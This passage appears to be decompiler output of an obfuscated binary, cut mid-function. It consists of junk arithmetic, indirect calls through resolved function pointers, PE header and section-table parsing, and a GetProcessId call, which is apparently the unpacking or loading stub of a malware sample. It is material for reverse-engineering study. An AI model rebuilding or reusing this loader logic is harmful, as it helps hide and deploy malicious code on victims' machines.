							_v56 =  *((intOrPtr*)(_t1287 + 0x41c58a));
							_t1645 = _t1631;
							_t1239 =  *((intOrPtr*)(_t1287 + 0xa901cc))(_v12);
							 *(_t1287 + 0x41c07c) =  *(_t1287 + 0x41c07c) & 0x00000000;
							 *(_t1287 + 0x41c07c) =  *(_t1287 + 0x41c07c) ^ (_t1645 & 0x00000000 | _t1239);
							_t1631 = _t1645;
							_t1221 = _t1491;
						}
					}
					 *(_t1287 + 0x41cf03) =  *(_t1287 + 0x41cf03) & 0x00000000;
					 *(_t1287 + 0x41cf03) =  *(_t1287 + 0x41cf03) ^ _t1631 & 0x00000000 ^ _t1221;
					_t1579 = _t1631;
					_pop(_t1465);
					_v12 = 0;
					_v48 = _v48 ^ _t1465;
					_v52 = _v52 - _t1661;
					_v52 = _v52 | _t1287 + 0x0041d17f;
					_v56 = _t1287 + 0x41c098;
					_t1077 =  *((intOrPtr*)(_t1287 + 0xa90130))(_v12, _t1661, _v12);
					_v12 = _t1465;
					 *(_t1287 + 0x41d558) =  *(_t1287 + 0x41d558) & 0x00000000;
					 *(_t1287 + 0x41d558) =  *(_t1287 + 0x41d558) | _t1465 ^ _v12 ^ _t1077;
					_pop(_t1399);
					if( *(_t1287 + 0x41d269) == 0) {
						if( *(_t1287 + 0x41d3e6) == 0) {
							_v56 = _v56 ^ _t1661;
							_v56 = _v56 | _t1399;
							_v60 = _v60 + 4;
							_v60 = _v60 - _t1077;
							_t1237 =  *((intOrPtr*)(_t1287 + 0xa901b8))(_t1077, _t1661);
							 *(_t1287 + 0x41d3e6) =  *(_t1287 + 0x41d3e6) & 0x00000000;
							 *(_t1287 + 0x41d3e6) =  *(_t1287 + 0x41d3e6) ^ (_t1491 - _v68 | _t1237);
							_t1491 = _t1491;
							_t1399 = 0;
						}
						_v56 = _v56 & 0x00000000;
						_v56 = _v56 + _t1399;
						_t1234 =  *((intOrPtr*)(_t1287 + 0xa9013c))(_t1287);
						if( *((intOrPtr*)(_t1287 + 0x41c523)) == 0) {
							_v60 = _t1234;
							_v64 =  *((intOrPtr*)(_t1287 + 0x41d854));
							_t1361 = _t1361;
							_push( *((intOrPtr*)(_t1287 + 0xa901c8))(_v12));
							_pop( *_t398);
							_push(_v12);
							_pop( *_t400);
							_t1234 = _t1491;
						}
						_v12 = _t1579;
						 *(_t1287 + 0x41d269) =  *(_t1287 + 0x41d269) & 0x00000000;
						 *(_t1287 + 0x41d269) =  *(_t1287 + 0x41d269) | _t1579 ^ _v12 | _t1234;
						_t1579 = _v12;
						_v12 = _v12 & 0x00000000;
						_v60 = _v60 + _t1287 + 0x41c68b;
						_t1077 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12);
						 *(_t1287 + 0x41d43f) =  *(_t1287 + 0x41d43f) & 0x00000000;
						 *(_t1287 + 0x41d43f) =  *(_t1287 + 0x41d43f) | _t1361 - _v64 | _t1077;
						_t1399 = _t1361;
					}
					_pop(_t1294);
					if( *(_t1287 + 0x41cdd3) == 0) {
						_v12 = 0;
						_v52 = _v52 ^ _t1294;
						_v12 = 0;
						_v56 = _v56 ^ _t1399;
						_t1077 =  *((intOrPtr*)(_t1287 + 0xa90140))(_v12, _v12);
						_v12 = _t1579;
						 *(_t1287 + 0x41cdd3) =  *(_t1287 + 0x41cdd3) & 0x00000000;
						 *(_t1287 + 0x41cdd3) =  *(_t1287 + 0x41cdd3) | _t1579 ^ _v12 ^ _t1077;
						_t1579 = _v12;
						_pop(_t1399);
						_pop(_t1294);
					}
					if( *(_t1287 + 0x41c922) == 0) {
						if( *(_t1287 + 0x41d9f6) == 0) {
							_v52 = _v52 & 0x00000000;
							_v52 = _v52 ^ _t1294;
							_v56 = _v56 & 0x00000000;
							_v56 = _v56 ^ _t1399;
							_t1077 =  *((intOrPtr*)(_t1287 + 0xa90140))();
							_v12 = _t1294;
							 *(_t1287 + 0x41d9f6) = 0 ^ _t1077;
							_t1399 = _t1661;
							_t1294 = _t1661;
						}
						_v52 = _v52 - _t1077;
						_v52 = _v52 ^ _t1294;
						_v56 = _v56 ^ _t1491;
						_v56 = _t1399;
						_v12 = 0;
						_v60 = _v60 ^ _t1287 + 0x0041c6dd;
						_t1225 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _t1491, _t1077);
						_v12 = _v12 & 0x00000000;
						_v64 = _v64 | _t1225;
						_v68 = _v68 & 0x00000000;
						_v68 = _v68 + _t1287 + 0x41c254;
						_t1227 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12);
						_t1362 = _t1399;
						_t1228 = _t1227 + _t1362;
						_v12 = _t1579;
						_t1364 = _t1362 & 0x00000000 | _t1579 & 0x00000000 ^  *(_t1287 + 0x41d070);
						_t1636 = _v12;
						if(_t1364 > _t1228) {
							_v68 = _t1287 + 0x41c6dd;
							_v72 = _v72 & 0x00000000;
							_v72 = _v72 | _t1287 + 0x0041c254;
							_t1228 =  *((intOrPtr*)(_t1287 + 0xa9012c))(_t1287, _v12);
						}
						_v12 = _t1364;
						 *((intOrPtr*)(_t1287 + 0x41d433)) = _t1228;
						_t1367 = _v12;
						_v68 =  *((intOrPtr*)(_t1287 + 0x41ca55));
						_t1579 = _t1636;
						_t1077 =  *((intOrPtr*)(_t1287 + 0xa90134))(_t1636);
						if( *(_t1287 + 0x41cca9) == 0) {
							_v12 = 0;
							_v72 = _v72 | _t1077;
							_v76 =  *((intOrPtr*)(_t1287 + 0x41ca5d));
							_t1470 = _t1399;
							_t1661 = _v80;
							_v80 =  *((intOrPtr*)(_t1287 + 0x41d8c3));
							_v84 =  *((intOrPtr*)(_t1287 + 0x41c7a2));
							_v88 = _v88 + 0x35;
							_v88 = _v88 - _t1579;
							_v92 =  *((intOrPtr*)(_t1287 + 0x41c603));
							_v96 = _v96 + 2;
							_v96 = _v96 - _t1367;
							_t1491 =  *_t1690;
							 *_t1690 =  *((intOrPtr*)(_t1287 + 0x41c9ba));
							_t1231 =  *((intOrPtr*)(_t1287 + 0xa901bc))(_t1367, _t1077, _t1579, _t1470, _t1077, _t1661, _t1399, _v12);
							_v12 = _t1367;
							 *(_t1287 + 0x41cca9) =  *(_t1287 + 0x41cca9) & 0x00000000;
							 *(_t1287 + 0x41cca9) =  *(_t1287 + 0x41cca9) ^ _t1367 ^ _v12 ^ _t1231;
							_t1367 = _v12;
							_t1077 = _t1491;
						}
						 *(_t1287 + 0x41c922) =  *(_t1287 + 0x41c922) & 0x00000000;
						 *(_t1287 + 0x41c922) =  *(_t1287 + 0x41c922) | _t1491 & 0x00000000 | _t1077;
						_t1491 = _t1491;
						if( *(_t1287 + 0x41c8ba) == 0) {
							_v72 = 1;
							_t1077 =  *((intOrPtr*)(_t1287 + 0xa901c0))(_t1579);
							_v12 = _t1367;
							 *(_t1287 + 0x41c8ba) = _t1077;
							_t1367 = _v12;
						}
						_pop(_t1399);
						if( *(_t1287 + 0x41d704) == 0) {
							_v12 = _v12 & 0x00000000;
							_v68 = _v68 ^ _t1399;
							_v72 =  *((intOrPtr*)(_t1287 + 0x41c024));
							_t1077 =  *((intOrPtr*)(_t1287 + 0xa901b8))(_t1367, _t1491, _v12);
							_v12 = _t1579;
							 *(_t1287 + 0x41d704) = 0 ^ _t1077;
							_t1579 = _v12;
							_t1399 = 0;
						}
						_pop(_t1294);
						if( *(_t1287 + 0x41d628) == 0) {
							_v64 = _t1294;
							_v12 = _v12 & 0x00000000;
							_v68 = _v68 + _t1399;
							_t1077 =  *((intOrPtr*)(_t1287 + 0xa90140))(_v12, _v12);
							 *(_t1287 + 0x41d628) =  *(_t1287 + 0x41d628) & 0x00000000;
							 *(_t1287 + 0x41d628) =  *(_t1287 + 0x41d628) | _t1294 & 0x00000000 ^ _t1077;
							_t1399 = _t1294;
							_pop(_t1294);
						}
					}
				}
				_push(_v12);
				 *_t1690 = _t1399;
				if( *(_t1287 + 0x41c643) == 0) {
					if( *((intOrPtr*)(_t1287 + 0x41c6ad)) == 0) {
						 *_t1690 =  *_t1690 - _t1579;
						 *_t1690 = _t1294;
						_v12 = _v12 & 0x00000000;
						_v24 = _v24 ^ _t1690;
						_t1203 =  *((intOrPtr*)(_t1287 + 0xa90138))(_v12, _t1579);
						_v12 = _t1491;
						 *((intOrPtr*)(_t1287 + 0x41c6ad)) = _t1203;
						_t1491 = _v12;
						_pop(_t1294);
					}
					if( *(_t1287 + 0x41c96a) == 0) {
						if( *((intOrPtr*)(_t1287 + 0x41c739)) == 0) {
							 *_t1690 =  *_t1690 & 0x00000000;
							 *_t1690 =  *_t1690 + _t1294;
							_push( *((intOrPtr*)(_t1287 + 0xa901d0))());
							_pop( *_t521);
							_push(_v12);
							_pop( *_t523);
							_t1294 = _t1661;
						}
						_v12 = _v12 & 0x00000000;
						_push(_v12);
						 *_t1690 =  *_t1690 ^ _t1294;
						_t1194 = _t1287 + 0x41c986;
						if( *(_t1287 + 0x41cf6b) == 0) {
							_v24 = _v24 ^ _t1399;
							_v24 = _t1194;
							_t1201 =  *((intOrPtr*)(_t1287 + 0xa9013c))();
							_v12 = _t1579;
							 *(_t1287 + 0x41cf6b) =  *(_t1287 + 0x41cf6b) & 0x00000000;
							 *(_t1287 + 0x41cf6b) =  *(_t1287 + 0x41cf6b) ^ (_t1579 ^ _v12 | _t1201);
							_t1579 = _v12;
							_t1194 = _t1399;
						}
						_push(_t1661);
						_v24 = _v24 & 0x00000000;
						_v24 = _v24 | _t1194;
						 *_t1194 = 0x14;
						if( *(_t1287 + 0x41c88f) == 0) {
							_t1200 =  *((intOrPtr*)(_t1287 + 0xa9013c))();
							 *(_t1287 + 0x41c88f) =  *(_t1287 + 0x41c88f) & 0x00000000;
							 *(_t1287 + 0x41c88f) =  *(_t1287 + 0x41c88f) | _t1399 ^  *_t1690 ^ _t1200;
							_t1399 = _t1399;
						}
						_t1195 =  *((intOrPtr*)(_t1287 + 0xa901c4))();
						if( *((intOrPtr*)(_t1287 + 0x41cec9)) == 0) {
							 *_t1690 =  *_t1690 ^ _t1294;
							 *_t1690 =  *_t1690 ^ _t1195;
							_t1579 = _v32;
							_v32 =  *((intOrPtr*)(_t1287 + 0x41c9ff));
							_push( *((intOrPtr*)(_t1287 + 0xa901cc))(_t1294));
							_pop( *_t548);
							_push(_v12);
							_pop( *_t550);
							_t1195 = _t1579;
						}
						 *_t1690 = _t1294;
						 *(_t1287 + 0x41c96a) = 0 ^ _t1195;
						_t1347 = 0;
						if( *(_t1287 + 0x41c916) == 0) {
							 *_t1690 =  *((intOrPtr*)(_t1287 + 0x41c902));
							_t1198 = GetProcessId(_t1195);
							_v12 = _t1347;
							 *(_t1287 + 0x41c916) =  *(_t1287 + 0x41c916) & 0x00000000;
							 *(_t1287 + 0x41c916) =  *(_t1287 + 0x41c916) ^ _t1347 ^ _v12 ^ _t1198;
						}
						_pop(_t1294);
					}
					_push(_t1287);
					 *_t1690 =  *_t1690 - _t1287;
					 *_t1690 =  *_t1690 ^ _t1294;
					if( *(_t1287 + 0x41ce84) == 0) {
						_t1193 =  *((intOrPtr*)(_t1287 + 0xa90110))();
						 *(_t1287 + 0x41ce84) =  *(_t1287 + 0x41ce84) & 0x00000000;
						 *(_t1287 + 0x41ce84) =  *(_t1287 + 0x41ce84) | _t1399 ^ _v24 ^ _t1193;
						_t1399 = _t1399;
					}
					_push(_t1690);
					_v24 = 0xb;
					if( *(_t1287 + 0x41c322) == 0) {
						if( *(_t1287 + 0x41d564) == 0) {
							_t1192 =  *((intOrPtr*)(_t1287 + 0xa901c8))(_t1661);
							 *(_t1287 + 0x41d564) =  *(_t1287 + 0x41d564) & 0x00000000;
							 *(_t1287 + 0x41d564) =  *(_t1287 + 0x41d564) | _t1294 ^ _v32 | _t1192;
							_t1294 = _t1294;
						}
						_t1191 =  *((intOrPtr*)(_t1287 + 0xa9013c))();
						_v12 = _t1399;
						 *(_t1287 + 0x41c322) =  *(_t1287 + 0x41c322) & 0x00000000;
						 *(_t1287 + 0x41c322) =  *(_t1287 + 0x41c322) | _t1399 - _v12 | _t1191;
						_t1399 = _v12;
					}
					_push(0);
					if( *(_t1287 + 0x41d9d0) == 0) {
						_v32 =  *((intOrPtr*)(_t1287 + 0x41c6d5));
						_t1399 = _t1399;
						_t1190 =  *((intOrPtr*)(_t1287 + 0xa90138))(_t1399);
						_v36 = _t1579;
						 *(_t1287 + 0x41d9d0) = 0 ^ _t1190;
						_t1579 = 0;
					}
					_t1077 =  *((intOrPtr*)(_t1287 + 0xa901b8))();
					_v12 = _t1294;
					 *(_t1287 + 0x41c643) =  *(_t1287 + 0x41c643) & 0x00000000;
					 *(_t1287 + 0x41c643) =  *(_t1287 + 0x41c643) | _t1294 & 0x00000000 ^ _t1077;
					_t1342 = _v12;
					if( *(_t1287 + 0x41d8b3) == 0) {
						_v32 = _t1077;
						_v36 =  *((intOrPtr*)(_t1287 + 0x41d8cb));
						_t1399 =  *_t1690;
						 *_t1690 =  *((intOrPtr*)(_t1287 + 0x41c134));
						_v44 = 0x75;
						_v48 =  *((intOrPtr*)(_t1287 + 0x41d17b));
						_v52 =  *((intOrPtr*)(_t1287 + 0x41ce9d));
						_v56 = 2;
						_v60 =  *((intOrPtr*)(_t1287 + 0x41d14a));
						_t1491 = _t1491;
						_t1189 =  *((intOrPtr*)(_t1287 + 0xa901bc))(_t1342, _v48, _t1399, _t1077, _t1342, _v36, _t1399, _v12);
						_v12 = _t1579;
						 *(_t1287 + 0x41d8b3) =  *(_t1287 + 0x41d8b3) & 0x00000000;
						 *(_t1287 + 0x41d8b3) =  *(_t1287 + 0x41d8b3) | _t1579 ^ _v12 ^ _t1189;
						_t1579 = _v12;
						_t1077 = _t1579;
					}
					_pop(_t1294);
					if( *((intOrPtr*)(_t1287 + 0x41d743)) == 0) {
						_v12 = _v12 & 0x00000000;
						 *_t1690 =  *_t1690 + _t1077;
						_v12 = 0;
						_v32 = _v32 + _t1294;
						_v36 =  *((intOrPtr*)(_t1287 + 0x41c613));
						_push( *((intOrPtr*)(_t1287 + 0xa901cc))(_v12, _v12));
						_pop( *_t625);
						_push(_v12);
						_pop( *_t627);
						_t1294 = _t1077;
						_pop(_t1077);
					}
				}
				_v12 = 0;
				 *_t1690 =  *_t1690 + _t1294;
				_v24 = _t1077;
				 *_t1690 =  *_t1690 - _t1661;
				 *_t1690 =  *_t1690 | _t1287 + 0x0041c692;
				_t1079 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _v12);
				_v32 = _t1661;
				 *((intOrPtr*)(_t1287 + 0x41c2fd)) = _t1079;
				_t1664 = 0;
				_t1080 = _t1661;
				if( *(_t1287 + 0x41c209) == 0) {
					 *_t1690 =  *_t1690 & 0x00000000;
					 *_t1690 =  *_t1690 | _t1080;
					_v32 = _v32 ^ _t1287;
					_v32 = _v32 + _t1287 + 0x41c35a;
					_t1174 =  *((intOrPtr*)(_t1287 + 0xa90128))(_t1491);
					 *(_t1287 + 0x41d804) =  *(_t1287 + 0x41d804) & 0x00000000;
					 *(_t1287 + 0x41d804) =  *(_t1287 + 0x41d804) | _t1399 & 0x00000000 | _t1174;
					_t1445 = _t1399;
					_t1175 = _t1287;
					_v12 = _v12 & 0x00000000;
					_push(_v12);
					_v32 = _v32 | _t1175;
					if( *(_t1287 + 0x41c6d1) == 0) {
						_t1181 =  *((intOrPtr*)(_t1287 + 0xa90140))();
						_v12 = _t1294;
						 *(_t1287 + 0x41c6d1) = 0 ^ _t1181;
						_t1294 = _v12;
					}
					_t1176 =  *((intOrPtr*)(_t1287 + 0xa901c8))();
					if( *(_t1287 + 0x41d8cf) == 0) {
						_v36 = _v36 ^ _t1445;
						_v36 = _v36 ^ _t1176;
						 *_t1690 = _t1176;
						_t1180 =  *((intOrPtr*)(_t1287 + 0xa90138))(_v12, _t1445);
						 *(_t1287 + 0x41d8cf) =  *(_t1287 + 0x41d8cf) & 0x00000000;
						 *(_t1287 + 0x41d8cf) =  *(_t1287 + 0x41d8cf) | _t1294 & 0x00000000 | _t1180;
						_t1294 = _t1294;
						_pop(_t1176);
					}
					 *(_t1287 + 0x41c209) =  *(_t1287 + 0x41c209) & 0x00000000;
					 *(_t1287 + 0x41c209) =  *(_t1287 + 0x41c209) | _t1445 & 0x00000000 | _t1176;
					_t1448 = _t1445;
					_v12 = _v12 & 0x00000000;
					_v36 = _v36 + _t1287 + 0x41cda5;
					 *_t1690 = _t1287 + 0x41c77b;
					_t1179 =  *((intOrPtr*)(_t1287 + 0xa90130))(_v12, _v12);
					_v44 = _t1448;
					 *(_t1287 + 0x41c936) = 0 ^ _t1179;
					_t1399 = 0;
				}
				 *_t1690 = _t1399;
				_t1081 = 0 ^ _a4;
				_t1402 = 0;
				if( *(_t1287 + 0x41c4d9) == 0) {
					_v12 = _v12 & 0x00000000;
					 *_t1690 =  *_t1690 + _t1081;
					_t1172 =  *((intOrPtr*)(_t1287 + 0xa90110))(_v12);
					_v12 = _t1491;
					 *(_t1287 + 0x41c4d9) =  *(_t1287 + 0x41c4d9) & 0x00000000;
					 *(_t1287 + 0x41c4d9) =  *(_t1287 + 0x41c4d9) ^ _t1491 & 0x00000000 ^ _t1172;
					_t1491 = _v12;
					_pop(_t1081);
				}
				_push(_v12);
				 *_t1690 = _t1081;
				_t1082 = _t1287 + 0x41c9be;
				if( *(_t1287 + 0x41cc37) == 0) {
					_v32 = _v32 - _t1664;
					_v32 = _v32 ^ _t1082;
					_t1171 =  *((intOrPtr*)(_t1287 + 0xa90110))();
					 *(_t1287 + 0x41cc37) =  *(_t1287 + 0x41cc37) & 0x00000000;
					 *(_t1287 + 0x41cc37) =  *(_t1287 + 0x41cc37) ^ _t1294 ^ _v36 ^ _t1171;
					_t1294 = _t1294;
					_t1082 = _t1664;
				}
				_push(_v12);
				_v32 = _t1082;
				if( *(_t1287 + 0x41d013) == 0) {
					_t1332 = _v36;
					_v36 =  *((intOrPtr*)(_t1287 + 0x41d216));
					 *_t1690 =  *_t1690 + 0xcf;
					 *_t1690 =  *_t1690 - _t1491;
					_v44 =  *((intOrPtr*)(_t1287 + 0x41da38));
					_t1491 = _t1491;
					_v48 =  *((intOrPtr*)(_t1287 + 0x41c6ee));
					_v52 =  *((intOrPtr*)(_t1287 + 0x41c89a));
					_t1616 = _t1579;
					_v56 =  *((intOrPtr*)(_t1287 + 0x41cfaf));
					_t1294 = _t1332;
					_t1170 =  *((intOrPtr*)(_t1287 + 0xa901bc))(0, _t1664, _t1402, _t1082, _t1332, _t1491, _t1294);
					 *(_t1287 + 0x41d013) =  *(_t1287 + 0x41d013) & 0x00000000;
					 *(_t1287 + 0x41d013) =  *(_t1287 + 0x41d013) ^ (_t1616 & 0x00000000 | _t1170);
					_t1579 = _t1616;
				}
				_t1083 = _t1287 + 0x41c33a;
				if( *(_t1287 + 0x41c6f2) == 0) {
					_v36 = _v36 & 0x00000000;
					_v36 = _v36 ^ _t1083;
					_t1664 =  *_t1690;
					 *_t1690 =  *((intOrPtr*)(_t1287 + 0x41d40e));
					_v44 =  *((intOrPtr*)(_t1287 + 0x41d55c));
					_t1167 =  *((intOrPtr*)(_t1287 + 0xa901b8))(_t1402, _t1664, _t1579);
					_v12 = _t1579;
					 *(_t1287 + 0x41c6f2) =  *(_t1287 + 0x41c6f2) & 0x00000000;
					 *(_t1287 + 0x41c6f2) =  *(_t1287 + 0x41c6f2) ^ (_t1579 ^ _v12 | _t1167);
					_t1579 = _v12;
					_t1083 = _t1294;
				}
				_v36 = _t1083;
				_t1084 =  *((intOrPtr*)(_t1287 + 0xa90130))(_v12);
				if( *((intOrPtr*)(_t1287 + 0x41c71e)) == 0) {
					 *_t1690 =  *_t1690 & 0x00000000;
					 *_t1690 =  *_t1690 | _t1084;
					_v44 =  *((intOrPtr*)(_t1287 + 0x41c05c));
					_t1491 = _t1491;
					_t1166 =  *((intOrPtr*)(_t1287 + 0xa901cc))(_t1664);
					_v48 = _t1579;
					 *((intOrPtr*)(_t1287 + 0x41c71e)) = _t1166;
					_t1579 = 0;
					_t1084 = _t1664;
				}
				 *_t1690 = _t1664;
				 *(_t1287 + 0x41c6e2) = _t1084;
				_t1667 = 0;
				_pop(_t1085);
				_t1086 = _t1085 +  *((intOrPtr*)(_t1085 + 0x3c));
				_v12 = 0;
				_v36 = _v36 | _t1086;
				 *_t1690 = _t1086;
				_v44 = _v44 ^ _t1667;
				_v44 = _v44 + _t1287 + 0x41c41d;
				_t1088 =  *((intOrPtr*)(_t1287 + 0xa90128))(_t1667, _v12, _v12);
				_v12 = _v12 & 0x00000000;
				_v48 = _v48 | _t1088;
				_v12 = _v12 & 0x00000000;
				_v52 = _v52 ^ _t1287 + 0x0041d640;
				_t1090 =  *((intOrPtr*)(_t1287 + 0xa90128))(_v12, _v12);
				_pop(_t1295);
				_v52 = _t1579;
				_t1296 = 0 ^  *(_t1287 + 0x41d1bb);
				_t1582 = 0;
				if(_t1296 > _t1090 + _t1295) {
					_v12 = _v12 & 0x00000000;
					_v52 = _v52 + _t1287 + 0x41c41d;
					_v56 = _v56 & 0x00000000;
					_v56 = _v56 + _t1287 + 0x41d640;
					_push( *((intOrPtr*)(_t1287 + 0xa9012c))(_t1296, _v12));
					_pop( *_t749);
					_push(_v12);
					_pop( *_t751);
				}
				_pop(_t1092);
				_v12 = _t1287;
				_t1493 = _t1491 & 0x00000000 ^ (_t1287 - _v12 | _t1092);
				_t1290 = _v12;
				if( *((intOrPtr*)(_t1290 + 0x41c312)) == 0) {
					_v48 =  *((intOrPtr*)(_t1290 + 0x41cf73));
					_t1157 = _t1092;
					_v52 =  *((intOrPtr*)(_t1290 + 0x41d2cd));
					_v56 = 0x6d;
					_v60 =  *((intOrPtr*)(_t1290 + 0x41d280));
					_v64 =  *((intOrPtr*)(_t1290 + 0x41d236));
					_t1529 = _t1493;
					_v68 =  *((intOrPtr*)(_t1290 + 0x41c883));
					_t1493 = _v72;
					_v72 =  *((intOrPtr*)(_t1290 + 0x41cd17));
					_push( *((intOrPtr*)(_t1290 + 0xa901bc))(_t1529, _t1296, _t1667, _t1493, _v52, _t1290, _t1157, _t1402));
					_pop( *_t769);
					_push(_v12);
					_pop( *_t771);
				}
				_v48 = _v48 - _t1402;
				_v48 = _v48 + ( *(_t1493 + 6) & 0x0000ffff);
				_v52 = _t1290 + 0x41d602;
				_t1095 =  *((intOrPtr*)(_t1290 + 0xa90128))(_v12, _t1402);
				_v56 = _v56 & 0x00000000;
				_v56 = _v56 ^ _t1095;
				_v12 = 0;
				_v60 = _v60 + _t1290 + 0x41d0e1;
				_t1097 =  *((intOrPtr*)(_t1290 + 0xa90128))(_v12, _t1582);
				_pop(_t1297);
				_t1299 = _t1297 & 0x00000000 | _t1493 & 0x00000000 ^  *(_t1290 + 0x41d0b1);
				_t1496 = _t1493;
				if(_t1299 > _t1097 + _t1297) {
					_v60 = _v60 ^ _t1667;
					_v60 = _v60 | _t1290 + 0x0041d602;
					_v64 = _v64 - _t1299;
					_v64 = _t1290 + 0x41d0e1;
					_t1155 =  *((intOrPtr*)(_t1290 + 0xa9012c))(_t1299, _t1667);
					 *(_t1290 + 0x41d2d9) =  *(_t1290 + 0x41d2d9) & 0x00000000;
					 *(_t1290 + 0x41d2d9) =  *(_t1290 + 0x41d2d9) | _t1582 & 0x00000000 ^ _t1155;
					_t1582 = _t1582;
				}
				_pop(_t1099);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 | _t1299 & 0x00000000 | _t1099;
				_t1302 = _t1299;
				_push(_t1402);
				_v56 = _v56 - _t1402;
				_v56 = _v56 + _t1496;
				if( *(_t1290 + 0x41ce8c) == 0) {
					_t1151 = _t1290 + 0x41cdbb;
					_v60 = _t1151;
					 *_t1151 = 0x14;
					_t1152 =  *((intOrPtr*)(_t1290 + 0xa901c4))(_v12);
					_v12 = _t1302;
					 *(_t1290 + 0x41ce8c) = 0 ^ _t1152;
				}
				_v12 = _t1290;
				_t1403 =  *(_t1496 + 0x54);
				_t1293 = _v12;
				_v60 = _v60 - _t1496;
				_v60 = _v60 ^ _t1403;
				_v12 = _v12 & 0x00000000;
				_v64 = _v64 ^ _t1293 + 0x0041ce10;
				_t1101 =  *((intOrPtr*)(_t1293 + 0xa90128))(_v12, _t1496);
				_v68 = _v68 - _t1667;
				_v68 = _v68 | _t1101;
				_v12 = 0;
				_v72 = _v72 ^ _t1293 + 0x0041c85c;
				_t1103 =  *((intOrPtr*)(_t1293 + 0xa90128))(_v12, _t1667);
				_pop(_t1303);
				_t1104 = _t1103 + _t1303;
				_t1305 = _t1303 & 0x00000000 ^ (_t1496 & 0x00000000 |  *(_t1293 + 0x41cb84));
				_t1499 = _t1496;
				if(_t1305 > _t1104) {
					_v72 = _t1293 + 0x41ce10;
					_v76 = _v76 & 0x00000000;
					_v76 = _v76 + _t1293 + 0x41c85c;
					_t1104 =  *((intOrPtr*)(_t1293 + 0xa9012c))(_t1499, _v12);
					_v12 = _t1403;
					 *(_t1293 + 0x41d7cd) =  *(_t1293 + 0x41d7cd) & 0x00000000;
					 *(_t1293 + 0x41d7cd) =  *(_t1293 + 0x41d7cd) | _t1403 - _v12 | _t1104;
				}
				_pop(_t1404);
				_t1501 = _t1499 & 0x00000000 | _t1104 ^ _v68 |  *(_t1293 + 0x41c507);
				_v12 = 0;
				_v68 = _v68 + _t1404;
				_v12 = _v12 & 0x00000000;
				_v72 = _v72 + _t1293 + 0x41cd66;
				_v76 = _v76 & 0x00000000;
				_v76 = _v76 | _t1293 + 0x0041da4c;
				_t1110 =  *((intOrPtr*)(_t1293 + 0xa90130))(_v12, _v12, _t1104);
				 *_t832 = _t1110;
				_push(_v12);
				_pop( *_t834);
				_t1405 = _t1305;
				_v12 = _t1405;
				_t1584 = _t1582 & 0x00000000 ^ _t1405 ^ _v12 ^ _a4;
				_t1408 = _v12;
				if( *(_t1293 + 0x41c094) == 0) {
					_v12 = _v12 & 0x00000000;
					_v76 = _v76 | _t1408;
					_t1110 =  *((intOrPtr*)(_t1293 + 0xa9013c))(_v12);
					 *(_t1293 + 0x41c094) =  *(_t1293 + 0x41c094) & 0x00000000;
					 *(_t1293 + 0x41c094) =  *(_t1293 + 0x41c094) | _t1501 - _v80 ^ _t1110;
					_t1501 = _t1501;
					_pop(_t1408);
				}
				_v12 = _t1110;
				_t1306 = _t1408;
				_v12 = 0;
				_v76 = _v76 + _t1306;
				_v80 = _t1408;
				_v84 = _v84 ^ _t1306;
				_v84 = _t1293 + 0x41c138;
				_t1115 =  *((intOrPtr*)(_t1293 + 0xa90128))(_t1306, _v12, _v12);
				_v88 = _v88 - _t1584;
				_v88 = _t1115;
				_v12 = 0;
				_v92 = _v92 + _t1293 + 0x41ccb5;
				_t1117 =  *((intOrPtr*)(_t1293 + 0xa90128))(_v12, _t1584);
				_pop(_t1307);
				_t1118 = _t1117 + _t1307;
				_t1309 = _t1307 & 0x00000000 | _t1501 ^ _v92 |  *(_t1293 + 0x41c82b);
				_t1504 = _t1501;
				if(_t1309 > _t1118) {
					_v92 = _v92 & 0x00000000;
					_v92 = _v92 + _t1293 + 0x41c138;
					_v96 = _v96 & 0x00000000;
					_v96 = _v96 + _t1293 + 0x41ccb5;
					_t1118 =  *((intOrPtr*)(_t1293 + 0xa9012c))(_t1309, _t1504);
					 *_t863 = _t1118;
					_push(_v12);
					_pop( *_t865);
				}
				_pop(_t1409);
				_pop(_t1310);
				if(_t1504 == _t1584) {
					L153:
					_pop(_t1505);
					if( *(_t1293 + 0x41c2ba) == 0) {
						_t1118 =  *((intOrPtr*)(_t1293 + 0xa901d0))();
						_v80 = _t1505;
						 *(_t1293 + 0x41c2ba) = _t1118;
						_t1505 = 0;
					}
					_t1506 = _t1505 + 0xf8;
					_t1121 = _t1118;
					if( *(_t1293 + 0x41c858) == 0) {
						_t1121 =  *((intOrPtr*)(_t1293 + 0xa90110))();
						_v80 = _t1409;
						 *(_t1293 + 0x41c858) = _t1121;
						_t1409 = 0;
					}
					do {
						_v12 = _v12 & 0x00000000;
						_push(_v12);
						_v80 = _v80 | _t1506;
						_t1586 = _t1584 & 0x00000000 ^ (_t1409 - _v84 | _a4);
						_t1409 = _t1409;
						if( *(_t1293 + 0x41d9ac) == 0) {
							_v84 = 4;
							_t1586 = _v88;
							_v88 =  *((intOrPtr*)(_t1293 + 0x41d04a));
							_t1121 =  *((intOrPtr*)(_t1293 + 0xa901b8))(_t1586, _t1667);
							 *(_t1293 + 0x41d9ac) =  *(_t1293 + 0x41d9ac) & 0x00000000;
							 *(_t1293 + 0x41d9ac) =  *(_t1293 + 0x41d9ac) ^ _t1506 ^ _v92 ^ _t1121;
							_t1506 = _t1506;
						}
						 *_t953 =  *((intOrPtr*)(_t1506 + 0x10));
						_push(_v12);
						_pop(_t1311);
						if( *(_t1293 + 0x41c781) == 0) {
							_v12 = _v12 & 0x00000000;
							_v84 = _v84 | _t1311;
							_v88 =  *((intOrPtr*)(_t1293 + 0x41c1bb));
							_t1667 = _t1667;
							_v92 =  *((intOrPtr*)(_t1293 + 0x41d962));
							_t1506 = _t1506;
							_t1121 =  *((intOrPtr*)(_t1293 + 0xa901b8))(_t1586, _v12);
							_v12 = _t1409;
							 *(_t1293 + 0x41c781) = _t1121;
							_t1409 = _v12;
							_t1311 = _t1409;
						}
						_t1584 = _t1586 +  *((intOrPtr*)(_t1506 + 0x14));
						if( *(_t1293 + 0x41c018) == 0) {
							_v12 = 0;
							_v84 = _v84 + _t1311;
							_t1121 =  *((intOrPtr*)(_t1293 + 0xa90140))(_v12);
							_v12 = _t1409;
							 *(_t1293 + 0x41c018) =  *(_t1293 + 0x41c018) & 0x00000000;
							 *(_t1293 + 0x41c018) =  *(_t1293 + 0x41c018) ^ (_t1409 & 0x00000000 | _t1121);
							_t1409 = _v12;
							_pop(_t1311);
						}
